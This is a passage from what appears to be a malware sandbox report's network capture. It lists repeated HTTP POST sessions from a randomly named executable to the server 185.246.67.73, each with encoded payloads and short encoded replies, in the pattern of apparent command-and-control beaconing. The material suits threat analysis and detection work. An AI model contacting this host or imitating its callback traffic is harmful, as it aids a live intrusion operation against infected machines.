                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:30.922065020 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:27:31.299752951 CET2584OUTData Raw: 50 53 43 54 5e 40 55 53 54 5e 50 59 5b 5c 59 5b 59 58 59 59 57 56 51 56 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PSCT^@UST^PY[\Y[YXYYWVQVYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-3[11:!55Y.':Y4/; ' Z2 %&+7'^/ ]!![ 0
                                                                                                                      Dec 8, 2024 15:27:32.238776922 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:32.472199917 CET151INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:32 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.449751185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:32.708889961 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:27:33.060019970 CET2584OUTData Raw: 55 5f 46 53 5e 44 55 50 54 5e 50 59 5b 5e 59 5b 59 55 59 5d 57 50 51 59 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U_FS^DUPT^PY[^Y[YUY]WPQYYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-%>.2%5*:B*_"8&X8;?$><20.\'+:7;.; ]!![ 8
                                                                                                                      Dec 8, 2024 15:27:34.033162117 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:34.269157887 CET151INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:33 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.449752185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:34.510154009 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:34.856924057 CET2584OUTData Raw: 55 58 46 50 5b 46 55 53 54 5e 50 59 5b 5f 59 5d 59 5d 59 5c 57 54 51 59 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: UXFP[FUST^PY[_Y]Y]Y\WTQYYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.%-5%."!Z,4#Z/+8S$>#%=&("7</ ]!![
                                                                                                                      Dec 8, 2024 15:27:35.831799030 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:36.064136028 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:35 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      10192.168.2.449753185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:36.301444054 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:36.656260014 CET2584OUTData Raw: 55 5f 43 52 5e 40 55 57 54 5e 50 59 5b 5d 59 53 59 58 59 5b 57 53 51 5f 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U_CR^@UWT^PY[]YSYXY[WSQ_YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-0..1=!#-'.Y4[/($$=?'#*2+& ?8/ ]!![ 4


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      11192.168.2.449754185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:36.808207989 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1904
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:37.153835058 CET1904OUTData Raw: 50 5b 46 54 5e 43 55 55 54 5e 50 59 5b 50 59 5c 59 54 59 5b 57 52 51 5f 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: P[FT^CUUT^PY[PY\YTY[WRQ_YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-0==X%*="9].$]4"[88+$X,Y%3*^&+&X48 ]!![
                                                                                                                      Dec 8, 2024 15:27:38.154244900 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:38.392328978 CET380INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:37 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 3a 0f 32 26 23 53 3e 03 3a 1e 27 2c 3b 5a 27 2b 23 5f 2b 30 05 15 24 07 3c 5d 38 39 2f 1d 21 3c 2b 05 30 2d 02 5d 36 05 30 08 2d 12 20 5a 06 10 22 02 25 59 3c 00 2a 28 25 5b 24 38 25 40 36 34 20 1c 27 3d 05 51 3e 14 07 07 37 01 02 0f 32 03 0f 56 2d 0b 35 00 26 30 02 0f 31 1c 2c 55 0f 1f 25 0b 33 0b 28 0a 37 37 3d 0d 20 30 20 07 32 0b 29 0b 22 06 30 57 2a 2e 3c 11 28 22 38 5c 22 21 24 06 2c 38 2d 14 2a 0b 28 09 33 3c 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: :2&#S>:',;Z'+#_+0$<]89/!<+0-]60- Z"%Y<*(%[$8%@64 '=Q>72V-5&01,U%3(77= 0 2)"0W*.<("8\"!$,8-*(3< S*.T3VR


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      12192.168.2.449755185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:36.992156982 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:37.341309071 CET2584OUTData Raw: 50 58 46 56 5b 44 55 5f 54 5e 50 59 5b 5e 59 5b 59 5d 59 5c 57 57 51 5d 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PXFV[DU_T^PY[^Y[Y]Y\WWQ]YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-%=-X2=Z! *.^#^9;($.('0-%(" ,8; ]!![ 8
                                                                                                                      Dec 8, 2024 15:27:38.312613964 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:38.552542925 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:38 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      13192.168.2.449756185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:38.784037113 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:27:39.138390064 CET2584OUTData Raw: 55 59 46 50 5b 48 55 5e 54 5e 50 59 5b 50 59 5b 59 5a 59 5f 57 56 51 5b 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: UYFP[HU^T^PY[PY[YZY_WVQ[YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.^3&!]!39Y,7* ;>,?$31"Y1;7,8.+ ]!![
                                                                                                                      Dec 8, 2024 15:27:40.115076065 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:40.348371029 CET151INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:39 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      14192.168.2.449757185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:40.618238926 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:40.966372013 CET2584OUTData Raw: 55 5e 46 51 5b 45 55 54 54 5e 50 59 5b 5e 59 5b 59 58 59 5e 57 53 51 5f 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U^FQ[EUTT^PY[^Y[YXY^WSQ_YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-$"&:![!#6-7:^7+6.+#3>?1!';X#<'Z, ]!![ 8
                                                                                                                      Dec 8, 2024 15:27:41.938554049 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:42.180918932 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:41 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      15192.168.2.449758185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:42.433418036 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:42.778847933 CET2584OUTData Raw: 50 58 46 54 5e 47 50 51 54 5e 50 59 5b 5e 59 5d 59 5f 59 57 57 5d 51 57 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PXFT^GPQT^PY[^Y]Y_YWW]QWYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-$!Y&*5[! =:*_78=;(($02#2_&+ Z(;; ]!![ 8


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      16192.168.2.449759185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:43.525492907 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1904
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:43.872566938 CET1904OUTData Raw: 50 5c 46 56 5e 42 50 52 54 5e 50 59 5b 50 59 5e 59 5a 59 5e 57 55 51 5b 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: P\FV^BPRT^PY[PY^YZY^WUQ[YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.31:9[" *-*X %,%-316\%;X7,+.; ]!![
                                                                                                                      Dec 8, 2024 15:27:44.864912987 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:45.100759983 CET380INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:44 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 3a 0e 27 26 33 1d 2a 3a 08 59 25 12 02 00 25 38 06 04 29 30 28 04 25 39 2c 19 3b 03 33 51 23 05 2c 5e 33 03 30 1e 22 2f 24 0f 39 02 20 5a 06 10 21 5f 25 01 34 00 28 2b 3d 5e 25 5e 3e 1c 36 24 37 44 33 13 0a 0b 3d 3a 36 5b 34 2f 3c 0d 26 2e 35 11 2d 0b 2e 5d 25 56 37 57 26 0c 2c 55 0f 1f 26 50 33 0c 2f 55 34 37 26 1c 21 30 37 14 26 25 07 0e 21 3f 30 57 28 13 2c 59 2a 22 05 02 20 22 2f 13 39 2b 2d 5e 29 1c 02 09 33 06 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: :'&3*:Y%%8)0(%9,;3Q#,^30"/$9 Z!_%4(+=^%^>6$7D3=:6[4/<&.5-.]%V7W&,U&P3/U47&!07&%!?0W(,Y*" "/9+-^)3 S*.T3VR


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      17192.168.2.449760185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:43.661802053 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:44.013179064 CET2584OUTData Raw: 55 59 43 50 5b 43 55 53 54 5e 50 59 5b 50 59 52 59 5b 59 5b 57 50 51 5f 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: UYCP[CUST^PY[PYRY[Y[WPQ_YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-35X2_9!3![-6 68+0&&+1#,;];+ ]!![
                                                                                                                      Dec 8, 2024 15:27:44.988032103 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:45.224329948 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:44 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      18192.168.2.449761185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:45.455959082 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
